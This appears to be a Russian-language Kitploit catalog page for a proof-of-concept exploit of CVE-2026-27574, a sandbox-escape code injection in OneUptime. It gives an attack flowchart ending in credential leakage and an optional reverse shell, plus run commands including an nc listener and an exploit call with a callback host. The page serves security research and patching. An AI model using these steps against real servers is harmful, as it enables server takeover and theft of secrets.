Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-27574-OneUptime-RCE — Эксплойт proof-of-concept для CVE-2026-27574, критической инъекции кода в OneUptime, позволяющей удалённое выполнение кода и утечку переменных окружения. | Kitploit
Инструменты/GitHubGitHub/mbanyamer/cve-2026-27574-oneuptime-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubmbanyamer/cve-2026-27574-oneuptime-rce

CVE-2026-27574-OneUptime-RCE

Эксплойт proof-of-concept для CVE-2026-27574, критической инъекции кода в OneUptime, позволяющей удалённое выполнение кода и утечку переменных окружения.

Репозиторий
16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-27574-OneUptime-RCE

Author Role Country Platform Vulnerability CVE CVSS Status

Обзор

Эксплойт Proof-of-Concept для CVE-2026-27574 — критической уязвимости внедрения кода (CWE-94) в OneUptime < 10.0.0, позволяющей произвольное выполнение JavaScript в контексте пробера, что приводит к полному и утечке чувствительных переменных окружения.

удалённому выполнению кода (RCE)

Исправлено в: OneUptime 10.0.0 (миграция на isolated-vm)

Тип эксплойта: Удалённый
Аутентификация: Низкие привилегии (любой зарегистрированный участник проекта)
Воздействие: Полная компрометация сервера, кража учётных данных, захват кластера

Схема атаки

root@kitploit:~
flowchart TD
    A[Start] --> B[Open Registration]
    B --> C[Register New Account]
    C --> D[Create New Project]
    D --> E[Obtain ProjectMember Role]
    E --> F[Create Custom JavaScript Monitor]
    F --> G[Inject Malicious vm Escape Payload]
    G --> H[Probe Executes Code Every ~60s]
    H --> I[Escape vm Context via constructor chain]
    I --> J[Access process & child_process]
    J --> K[Execute System Commands]
    J --> L[Leak Environment Variables]
    K --> M[Read /etc/passwd, id, hostname, etc.]
    L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
    M --> O[Full RCE Achieved]
    N --> O
    O --> P[Optional: Reverse Shell / Data Exfiltration]
    P --> Q[End - System Compromised]

Возможности этого PoC

  • Автоматическая регистрация аккаунта
  • Создание проекта
  • Создание вредоносного JavaScript-монитора
  • Утечка переменных окружения
  • Доказательство базового выполнения команд
  • Опциональная полезная нагрузка reverse shell (закомментирована)

Использование

root@kitploit:~
# Запустить слушатель (при использовании reverse shell)
nc -lvnp 4444

# Запустить эксплойт
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444

Требования

  • Python 3.6+
  • Библиотека requests (pip install requests)

Правовое и этическое уведомление

Этот код предоставлен только для образовательных целей и авторизованного тестирования безопасности.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.

Ссылки

  • GitHub Advisory GHSA-v264-xqh4-9xmm
  • Patch Commit

Разработано Mohammed Idrees Banyamer • Иордания • @banyamer_security

Скачать инструмент